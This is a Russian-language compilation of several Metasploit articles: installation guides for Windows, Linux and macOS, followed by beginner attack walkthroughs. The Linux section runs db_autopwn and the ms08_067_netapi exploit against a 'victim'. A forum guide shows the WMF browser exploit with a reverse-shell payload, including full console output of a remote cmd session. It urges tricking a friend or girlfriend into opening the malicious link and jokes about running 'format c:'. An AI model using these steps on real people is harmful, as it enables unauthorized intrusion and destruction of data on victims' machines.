Взлом компьютера с помощью Metasploit Framework


Всем привет! После выхода Metasploit Community, которая мне очень не понравилась, я задался вопросом как же вернуть привычную для меня структуру этого инструмента. И решил я этот вопрос для себя, скачав и настроив dev версию. И всё было хорошо, пока недавно мне не пришлось настраивать тоже самое на Windows. Кого интересует данная проблема прошу под кат.

На самом деле пишу эти строки больше для себя, чтобы при повторном появлении проблемы не наступать на те же самые грабли, но если данная информация будет востребована сообществом, то будет очень хорошо.
Как ни странно, но скачивание ветки metasploit будет практически последним этапом, а в начале приготовления к этому.

  1. Установка Git for Windows
    Т.к. metasploit полностью переехал на git, то без него никуда, поэтому качаем Git for Windows и устанавливаем его. Установка у него банальная, поэтому заострять внимание на ней я не буду.
  2. Установка Ruby 1.9.3
    Все знают, что при использовании metasploit без Ruby никуда, поэтому следующим шагом нам нужно установить Ruby.
    Для этого качаем установщик Ruby 1.9.3 для Windows отсюда и запускаем его. Установка Ruby тоже не должна вызвать у вас проблем, но обратите, пожалуйста, внимание на один момент — не забудьте поставить галочку напротив пункта «Add Ruby executables to your PATH», чтобы впоследствии не возиться с путями к Ruby.
  3. Установка Development Kit для Ruby и настройка WinPcap
    Так же для правильной работы Metasploit нам потребуется DevKit для Ruby, который можно скачать по той же ссылке, что и сам Ruby. После того как вы его скачали, скопируйте его в папку, в которую вы его хотите распаковать(у меня это c:\rubydk) и распакуйте. Так же нам в дальнейшем понадобиться пакет pcaprub, а для него нужно скачать и установить WinPcap и WinPcap Developer’s Pack.
    С установкой WinPcap, я думаю, ни у кого проблем не возникнет. В DevPack’е нас интересует две папки — /lib и /include. Содержимое папки lib нужно скопировать в папку lib, которая находится в папке с установленным Ruby, а содержимое папки Include в папку Include/ruby-1.9.1, которая также находится в папке Ruby.
    Ну и для завершения установки DevKit нам осталось вызвать командную строку, перейти в папку с DevKit’ом и выполнить две команды:


    И если никаких ошибок не высветиться, то с этим этапом покончено

  4. Клонирование ветки Metasploit Framework и подготовка к запуску
    Вот мы и подошли к самому Metasploit Framework. Итак для начала скланируем его, выполнив следующую комманду:

    Так же для корректной работы Metasploit Framework нам нужно установит необходимые gem’сы и выполнить msfupdate. Для этого выполним следующие комманды:

    И если всё выполнилось удачно, то вы получили последнюю рабочую версию Metasploit Framework Dev. Теперь вы можете выполнить:

    и начать работать

А можете дополнительно поставить Msfgui как я. Для этого скачайте архив его ветки с github’а, из архива скопируйте файл msfgui.exe и папку dist в папку metasploit-framework и запустите msfgui.

На этом всё! Получилась такая маленькая и скромненькая инструкция. Некоторые части которой искались на множестве форумов, но я их не указал, т.к. не помню уже, да и использовались из них только команды. Все пожелания, ошибки и недочёты прошу в комментарии. Так же если кому будет интересно могу помочь сделать тоже самое на Linux’е.

ссылка на оригинал статьи http://habrahabr.ru/post/217017/

Metasploit Project — проект, посвященный информационной безопасности. Создан для предоставления информации об уязвимостях, помощи в создании сигнатур для IDS, создания и тестирования эксплоитов. Наиболее известен проект Metasploit Framework — удобная платформа для создания и отладки эксплоитов. Кроме того, проект включает в себя базу опкодов, архив шеллкодов и информацию по исследованиям компьютерной безопасности. http://ru.wikipedia.org/wiki/Metasploit

В начале необходимо установить Metasploit Framework. Для этого поставим все необходимые пакеты.

sudoapt-getinstall ruby libopenssl-ruby libyaml-ruby libdl-ruby libiconv-ruby libreadline-ruby irb ri rubygems sudoapt-getinstall subversion sudoapt-get build-dep ruby sudoapt-getinstall ruby-dev libpcap-dev sudoapt-getinstall rubygems libsqlite3-dev sudo gem install sqlite3-ruby sudoapt-getinstall rubygems libmysqlclient-dev sudo gem install mysql

Далее скачиваем Metasploit Framework вот тут: http://downloads.metasploit.com/data/releases/metasploit-latest-linux-installer.run:

wget http://downloads.metasploit.com/data/releases/metasploit-latest-linux-installer.run chmod +x metasploit-latest-linux-installer.run

И запускаем…

sudo ./metasploit-latest-linux-installer.run

После установки необходимо обновить Metasploit Framework

sudo msfupdate

Теперь самый простой вариант использования Metasploit Framework. Запустим консоль.

msfconsole

Теперь добавим нашу жертву в базу данных и информацию про его порты.

db_nmap -sT-sV 192.168.1.1

Отправим все на автоматический взлом . Данная команда стала неактуальной в последних версиях.

db_autopwn -p-t-e

Если в конце процесса появятся сессии, значит взлом удался.

Metasploit инструкция по применению.

Выбираем сессию и в ходим в нее.

session -i1

Альтернатив db_autopwn нет. Использовать эксплоиты можно в ручную. Например так:

#Загружаем нужный нам эксплоит use exploit/windows/smb/ms08_067_netapi #Смотрим опции show options #Заполняем необходимые поля например IP адрес жертвыset RHOST 192.168.84.58 #Проверяем актуален ли эксплоит для жертвы check #Ломаем exploit

Далее можно заняться многим, все зависит от ваших полномочий в системе. Для просмотра команд доступных Вам наберите:

help

В конце для выхода обратно из сессии и удаления данного хоста из базы данных проделываем следующую операцию:

exit hosts -d 192.168.1.1

Иногда Базы данных отваливаются я решил данный вопрос вот так:

sudoapt-getinstall postgresql sudoapt-getinstall libpgsql-ruby sudosu postgres createuser root -P Enter password for new role: 123 Enter it again:123 Shall the new role be a superuser? (y/n) n Shall the new role be allowed to create databases? (y/n) n Shall the new role be allowed to create more new roles? (y/n) n createdb —owner=root metasploit exit msfconsole db_connect root:123@127.0.0.1/metasploit

Александр Ф Михайлов (ChelAxe)

Конкурс

Metasploit Framework

(Или как юзать пакет Metasploit Framework для новичков)

Предисловие.

Многие слышали наверно слова Метасплоит, метафайлы, эксплоит, шелл, уязвимость. Очень много вопросов возникает у пользователей (начинающих скрипткидисов, а так же тестеров сплоитов и уязвимостей) которые с этим так или иначе сталкиваются, вот как раз для них эта статья. Тут я расскажу Вам что такое проект Metasploit Framework и как им пользоваться. Сразу скажу что статья расчитана для тех кто задаёт вопросы типа этих:

1.

cd \
cd %SystemRoot%\system32
msfconsole: chdir: failed to change directory No such file or directory
Это как понимать???

2. или типа этого:
+ — —=[ msfconsole v2.6 [145 exploits — 75 payloads]

msf > ls exploits
ls: exploits: No such file or directory
msf >
А как понимать это???

1.Основные понятия и термины используемые в статье. (знающие могут пропустить):

Эксплоит: (англ. exploit — использовать) — это общий термин в сообществе компьютерной безопасности для обозначения фрагмента программного кода который, используя возможности предоставляемые ошибкой, отказом или уязвимостью, ведёт к повышению привилегий или отказу в обслуживании компьютерной системы.*

Шелл-код: Код оболочки, шелл-код (англ. shellcode) — это двоичный исполняемый код, который обычно передаёт управление консоли, например ‘/bin/sh’ Unix shell, command.com в MS-DOS и cmd.exe в операционных системах Microsoft Windows. Код оболочки может быть использован как полезная нагрузка эксплойта, обеспечивая взломщику доступ к командной оболочке (англ. shell) в компьютерной системе.*

Реверс-шелл: При эксплуатации удаленной уязвимости шелл-код может открывать заранее заданый порт TCP уязвимого компьютера, через который будет осуществляться дальнейший доступ к командной оболочке, такой код называется привязывающим к порту (англ. port binding shellcode). Если шелл-код осуществляет подключение к порту компьютера атакующего, что производится с целью обхода брандмауэра или NAT, то такой код называется обратной оболочкой (англ. reverse shell shellcode).

Уязвимость: В компьютерной безопасности, термин уязвимость (англ.vulnerability) используется для обозначения слабозащищённого или открытого места в системе. Уязвимость может быть результатом ошибок программирования или недостатков в дизайне системы. Уязвимость может существовать либо только теоретически, либо иметь известный эксплойт. Уязвимости часто являются результатом беззаботности программиста, но, также, могут иметь и другие причины. Уязвимость обычно позволяет атакующему обмануть приложение, например,с помощью внедрения данных каким-нибудь незапланированным способом, выполнения команды на системе, на которой выполняется приложение, или путем использования упущения, которое позволяет получить непредусмотренный доступ к памяти для выполнения кода на уровне привилегий программы. Некоторые уязвимости появляются из-за недостаточной проверки данных, вводимых пользователем; часто это позволяет напрямую выполнить команды SQL (SQL-инъекция). Другие уязвимости появляются из-за более сложных проблем, таких как запись данных в буфер, без проверки его границ, в результате буфер может быть переполнен, что может привести к исполнению произвольного кода.

Cygwi (Цигвин): набор свободных программных инструментов разработанных фирмой Cygnus Solutions, позволяющих превратить Microsoft Windows различных версий в некоторое подобие Unix-системы. Изначально Cygwin задумывался как среда для переноса программ из POSIX-совместимых операционных систем (таких как GNU/Linux, BSD и UNIX) в Windows. Программы, портированные с помощью Cygwin, работают лучше всего в Windows NT, Windows 2000, Windows XP и Windows Server 2003, но в некоторых случаях годятся Windows 95 и Windows 98. В настоящее время проект Cygwin разрабатывается сотрудниками Red Hat и другими программистами.

Metasploit Краткое руководство

Подобные функциональные возможности предлагает также и Microsoft в своём пакете Services for UNIX, включающем в себя подсистему Interix.*

Perl (Перл): Язык программирования. Создатель Ларри Уолл (Larry Wall). Само слово Perl — аббревиатура, которая расшифровывается как Practical Extraction and Report Language (практический язык извлечений и отчётов, отчего сначала язык назывался PEARL, но затем буква «A» «потерялась»). Существует также ряд других вариантов. Согласно самому красивому из них, название perl произошло от слова pearl (жемчужина). Талисманом языка Perl является верблюд — не слишком красивое, но очень выносливое животное, способное выполнять тяжелую работу. Основной особенностью языка считаются его богатые возможности для работы с текстом, реализованные при помощи регулярных выражений.*

(определения взяты из выкипедии)

2. Что такое Metasploit Framework?

Metasploit Framework (согласно описанию) это законченная среда для написания, тестирования и использования кода эксплойтов. Эта среда обеспечивает надежную платформу для испытаний на проникновение, разработки шелкодов и исследования уязвимостей". Написан на Perl (с некоторыми частями на ассемблере, Python и C) – отсюда нет привязки к какой либо платформе – будет работать в любой системе, где есть интерпретатор Perl`a (с оговоркой, см. дальше). На данный момент, пакет Metasploit Framework функционирует как на Linux так и на Windows, а так же на Мас.

Скачать последнюю версию пакета для соответствующей ОС можно здесь: http://www.metasploit.com/
(Среда под Windows базируется на доработанном Cygwin, что удобно, т.к. это дает пользователю извесную консоль. Однако, были некоторые проблемы с поддержкой Active Perl, поэтому поддерживается только Cygwin Perl.

3. Установка (для win- пользователей)

Инсталлятор для windows содержит всё необходимое (Сygwin, Perl), т. е. пользователям windows дополнительное ПО скачивать не потребуется.
Качаем тут: (доступная версия 2.6 для windows на момент написания статьи).
Тут лежит версия 2.7 Щас она актуальней (больше сплоитов).

Запускаем инсталлятор: framework-2.6.exe

Получаем: в C:\Program Files\Metasploit Framework\
cygwin.bat (41.0B) — запуск cygwin
msfconsole.bat (86.0B) — запуск консоли MSF
msfupdate.bat (85.0B) — запуск обновления пакета
msfweb.bat (82.0B) — запуск WEB-интерфейса пакета
Metasploit Framework.url (51.0B) — линк на сайт разработчиков
uninst.exe (47.6KB) — деинсталяция пакета

а также папки bin, etc, home, lib, sbin, tmp, usr, var — хорошо известные поклонникам Unix-систем.

4. Использование.

Пакет Metasploit Framework имеет два варианта работы: msfconsole (консольный) и web- интерфейс msfweb. Мне удобней всегда работать в msfconsole. Это интерфейс командной строки (по типу cmd с минимальным набором команд), имеющий собственное программное окружение и систему команд. Чтоб посмотреть основные команды наберите в консоли help. Для тех у кого туго с английским привожу перевод help`a. Рассмотрим консольный вариант работы пакета.

msf > help

Metasploit Framework Main Console Help
======================================

? ———— Show the main console help (Показать главное окно помощи)
cd ———— Change working directory (Выбрать рабочую директорию)
exit ———- Exit the console (Выход из консоли)
help ——— Show the main console help (Показать главное окно помощи)
info ———- Display detailed exploit or payload information (Вывести на дисплей детальную инфу о эксплоите или начинке)
quit ———- Exit the console (Выход из консоли)
reload ——— Reload exploits and payloads (Перезагрузить эксплоит и начинки)
save ——— Save configuration to disk (Записать конфигурацию на диск)
setg ———- Set a global environment variable (Установить глобальную переменную окружения)
show ——— Show available exploits and payloads (Показать доступные эксплоиты и начинки)
unsetg ——- Remove a global environment variable (Удалить глобальную переменную окружения)
use ———— Select an exploit by name (Выбрать эксплоит по имени для использования)
version ——- Show console version (Показать версию консоли)
—-нет в help`е——
ls ————- List the current directory (Показать файлы в текущей директории)
exploit ——— Run exploit (Запуск эксплоита)
msf >

М…да, скажете вы help бедноват и команд мало. Ну ничего, сами догоним что к чему.
cd [имя_директории]- стандартная команда (как и в cmd, так и в древнем дос — делает то же самое и здесь, с ней всё ясно, для тех кто в танке наберите help cd в консоли cmd)
Конечно всем не терпится использовать команду use [имя эксплоита], а затем установить переменную PAYLOAD какой либо вкусной начинкой, но всё по порядку, начнём!

5. Распрастранённые ошибки 90% новичков.
(продвинутым в режиме командной строки пропустить обязательно! ):

1 Ошибка.
Первая команда юзера после загрузки консоли ls exploits
В этом случае их постигает такой облом:

msf > ls exploits
ls: exploits: No such file or directory
msf >

И все разом говорят у меня нет эксплоитов!
А надо сделать всего лишь команду ls без параметров, чтоб посмотреть где мы находимся.

msf > ls
framework perl.exe.stackdump run_msfupdate userguide.pdf
framework.tar run_msfconsole run_msfweb
msf >

Вот теперь мы видим, что папки с эксплоитами тут нет, так как она, скорее всего, находится внутри папки framework.
В чём проблема, переходим в папку framework и посмотрим там:

msf > cd framework
msfconsole: chdir: changed to directory framework
msf >

Прекрасно! Теперь глянем что тут внутри скомандовав ls:

msf > ls
data exploits msfcli msfencode msfpescan nops src
docs extras msfconsole msflogdump msfupdate payloads tools
encoders lib msfelfscan msfpayload msfweb sdk
msf >

О! Сколько тут всего! И эксплоиты и начинки и доки. Вот теперь можно командовать ls exploits

msf > ls exploits
3com_3cdaemon_ftp_overflow.pm mozilla_compareto.pm
Credits.pm ms05_039_pnp.pm
————-много других эксплоитов——————-
mercantec_softcart.pm wsftp_server_503_mkd.pm
mercur_imap_select_overflow.pm wzdftpd_site.pm
mercury_imap.pm ypops_smtp.pm
minishare_get_overflow.pm zenworks_desktop_agent.pm
msf >

Во! Сколько сплоитов! (А говорили нет эксплоитов. оказывается всё со сплоитами в порядке — они есть)

2 Ошибка

Команда use [имя_экплоита.pm]

msf > use ie_xp_pfv_metafile.pm
msfconsole: use: please specify a valid exploit name
msf >

Расширение эксплоита pm — указывать не надо, только имя сплоита!

msf > use ie_xp_pfv_metafile
msf ie_xp_pfv_metafile >

3 Ошибка

После удачного выбора нужного сплоита сразу выбирают начинку (забывая про параметры)

msf > use ie_xp_pfv_metafile
msf ie_xp_pfv_metafile > set PAYLOAD win32_reverse
PAYLOAD -> win32_reverse
msf ie_xp_pfv_metafile(win32_reve
rse) > exploit
Error: Missing required option: LHOST
msf ie_xp_pfv_metafile(win32_reverse) >

Облом! Это что ещё? Перевожу отсутствует (не задана) рекомендованная опция (параметр) LHOST
Вообщем перед тем как начинять сплоит, я советую задать (установить) все необходимые параметры с помощью команды set.
У каждого сплоита их может быть разное количество (зависит от конкретной уязвимости)
Ну и что делать, как узнать какие параметры у какого сплоита? Ответ уже был выше! в help`e! Коммандуем: info [имя_сплоита], например узнаем всё про wmf-сплоит (ie_xp_pfv_metafile)

msf > info ie_xp_pfv_metafile
Name: Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Executi
Class: remote
Version: $Revision: 1.18 $
Target OS: win32, winxp, win2003
Keywords: wmf
Privileged: No
Disclosure: Dec 27 2005

Provided By:
H D Moore <hdm [at] metasploit.com
san <san [at] xfocus.org>
O600KO78RUS[at]unknown.ru

Available Targets:
Automatic — Windows XP / Windows 2003 / Windows Vista

Available Options:

Exploit: Name Default Description
——— ——— ——- —————————————
optional REALHOST External address to use for redirects
T)
optional HTTPHOST 0.0.0.0 The local HTTP listener host
required HTTPPORT 8080 The local HTTP listener port

……….пропущено………….
msf >

Вот вам вся и подробная инфа о сплоите, нас интересует optional
Для ленивых:
HTTPHOST (LHOST) — Локальный IP адрес сервера на котором повиснет сплоит (адрес твоего компа)
HTTPORT (LPORT) — его порт (8080 — по умолчанию)
REALHOST (RHOST) — внешний адрес для редиректа (WAN — адрес если твой комп находится за NAT)

4. Ошибка
Важно! Всегда и везде имена переменных окружения писать только ЗАГЛАВНЫМИ буквами!
5. Ошибка
>msf ie_xp_pfv_metafile(win32_reverse) > exploit
msf >Could not start listener: Operation not permitted
Что делать?

— освободить порт (уже занят чем то, буквально — немогу запустить слущатель:операция не разрешена) или использовать другой, например set LPORT 8081

6 Ошибка
Client connected from ххх.ххх.ххх.ххх:1879…
Undefined subroutine &Pex::Utils::JSUnescape called at /home/framework/exploits/
ie_vml_rectfill.pm line 156.
Exiting Reverse Handler.
msf ie_vml_rectfill(win32_reverse) >
Это ещё что? Неопределённая подпрограмма и … ну вообщем скорее всего вы скачали свежий сплоит и засунули в старую версию пакета, вообщем работать не будет. Cплоиты которые вышли после пакета в большинстве своём будут работать только на свежей версии, на данный момент 2.7 (как раз касается свежего сплоита ie_vml_rectfill.pm. Так что или обновляйте пакет, либо качайте последний…

6. Пример
(практическое использование).
Эксплоит: ie_xp_pfv_metafile, начинка win32_reverse

msf > use ie_xp_pfv_metafile
msf ie_xp_pfv_metafile > set LHOST 10.0.0.1
LHOST -> 10.0.0.1

Вообщем разобрались задали всё необходимое для сплоита, теперь можно переходить к начинке:
командуем set PAYLOAD [имя_начинки],

msf ie_xp_pfv_metafile > set PAYLOAD win32_reverse
PAYLOAD -> win32_reverse
msf ie_xp_pfv_metafile(win32_reverse) >msf ie_xp_pfv_metafile(win32_reverse) > exploit
Starting Reverse Handler.
Waiting for connections to http://10.0.0.1:8080/

Готово! Консоль говорит, что жду соединений к http://10.0.0.1:8080/
Впариваем ссылку другу (или подружке) например через асю..

Маша, смотри какой прикол: http://10.0.0.1:8080/ (прим. вообще-то тут должен быть внешний ip)

Юзвер заходи по ссылке (и если у него есть эта конкретная уязвимость в IE) в консоли мы должны увидеть вот что:

HTTP Client connected from 10.0.0.2:1116, redirecting… — клиент соединился, его IP 10.0.0.2:1116, редирект
HTTP Client connected from 10.0.0.2:1117, sending 1604 bytes of payload… — отправлено 1604 байт начинки (реверс-шелл тут)
Got connection from 10.0.0.1:4321 <-> 10.0.0.2:1118 — установлено соединение (пайп с cmd удалённого компа)
Microsoft Windows XP [‘?абЁп 5.1.2600]
(‘) ?RаЇRа жЁп ? cЄаRбRдв, 1985-2001.
C:\Documents and Settings\?¤¬Ё-Ёбва вRа\? ЎRзЁc бвR<>

О блин!, Это ещё что, скажете Вы — это командная строка удалённого компа того юзверя!
А что за абракадабра? — Это не та кодовая страница выбрана (у него русская винда стоит!) Щас проверим! chcp

C:\Documents and Settings\?¤¬Ё-Ёбва вRа\? ЎRзЁc бвR<>chcp
chcp
‘?Єгй п ЄR¤Rў п бва -Ёж : 866
C:\Documents and Settings\?¤¬Ё-Ёбва вRа\? ЎRзЁc бвR<>

Точно это 866, поставим 1251 (виндовую, а не дос)

C:\Documents and Settings\?¤¬Ё-Ёбва вRа\? ЎRзЁc бвR<>chcp 1251
chcp 1251
‘?Єгй п ЄR¤Rў п бва -Ёж : 1251
C:\Documents and Settings\Администратор\Рабочий стол>

О! Теперь всё по русски! Что делать в cmd чужого компа зависит от вашей фантазии, список команд смотрите в help по консольным командам windows. (format c: — жесть!)
Был разобран конкретный пример использования WMF-Эксплоита с начинкой реверс-шелла, ваши варианты могут быть другими.

Источник: http://forum.antichat.ru/thread21599.html

0

Взлом с помошью Metasploit Framework

.

Metasploit – чрезвычайно популярная утилита, которая позволяет искать цели, эксплуатировать уязвимости и внедрять шелл-код.

Автор: Barrow

Metasploit – чрезвычайно популярная утилита, которая позволяет искать цели, эксплуатировать уязвимости и внедрять шелл-код. В общем, Metasploit является незаменимым инструментом пентестера, и я тоже не смог обойти стороной эту тему.

На данный момент установка Metasploit в macOS отнимает намного меньше времени, чем раньше. Пару лет назад мне пришлось бы загружать все необходимые модули и делать настройку вручную. Сейчас для Metasploit Framework создан установочный пакет под macOS (ранее эта операционная система называлась Mac OS X).

Конечно, мы можем воспользоваться Metasploit, который идет в составе Kali Linux, установленного нами ранее на виртуальной машине, однако я использую Kali только в том случае, когда нужная утилита не работает в macOS (например, Aircrack-ng). Кроме того, запуск утилит в основной операционной системе быстрее и проще, чем на виртуальной машине.

Шаг 1: Загрузка установщика Metasploit Framework

Первый шаг – загрузка установочного пакета с сайта компании Rapid7.

Существует несколько редакций Metasploit: Pro, Express, Community, и Framework. Версия Express стоит 5,000$, Pro – в несколько раз дороже. Поскольку далеко не у каждого из нас есть подобная сумма в кармане, которую мы можем легко потратить, мы будем использовать бесплатную редакцию Community с интерфейсом на базе командной строки.

После загрузки установочного пакета для macOS запустите установщик и следуйте инструкциям. Во время установки потребуется ввод пароля.

Инструменты Kali Linux


Рисунок 1: Интерфейс установочного пакета Metasploit Framework для macOS

Шаг 2: Настройка Metasploit

Теперь нужно сконфигурировать Metasploit. Откройте терминал и перейдите в директорию, где находится msfconsole (главный интерфейс для Metasploit Framework):

  • cd /opt/metasploit-framework/bin/


Рисунок 2: Содержимое вложенных папок в Metasploit Framework

Затем запустите msfconsole при помощи следующей команды:

После запуска вам будет предложено добавить /opt/metasploit-framework/bin в качестве пути, используемого по умолчанию.

Ответьте «yes», если хотите запускать msf-команды из любой рабочей директории.


Рисунок 3: Добавление директории с msf-утилитами в качестве пути, используемого по умолчанию

Далее будет предложено установить базу данных, в которой будут храниться учетные записи, хосты и многое другое.


Рисунок 4: Запрос на установку новой базы данных

После установки базы данных вы окажетесь внутри консоли msfconsole. Установка завершена.

Проверяем работоспособность базы данных при помощи следующей команды:


Рисунок 5: Результат выполнения команды db_status

Как видно из рисунка выше, база данных подключена и работает.

Шаг 3: Обновление Metasploit

Перед началом изучения азов Metasploit, убедимся, что у нас самая свежая версия. В терминале введите следующую команду:

Появится запрос на ввод пароля суперпользователя. После ввода пароля начнется обновление.

Рисунок 6: Обновление Metasploit

Заключение

Как вы могли убедиться, установка Metasploit не представляет особых сложностей. Рекомендую также ознакомиться с другими статьями, посвященными работе с msfconsole.

Кроме того, установка других утилит, используемых во время пентестов, в macOS, как например, средств управления проектами, написанными на Ruby и Python, также не составляет труда. Однако помимо языков программирования важным является то, что архитектура macOS совместима со стандартом POSIX, что значительно упрощает портирование Linux-приложений. Продукты компании Apple становятся все более популярными среди разработчиков и IT-профессионалов. Чем больше IT-профессионалов начнут пользоваться macOS, чем больше новых утилит (в том числе портированных Linux-приложений) мы увидим в ближайшем будущем.

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *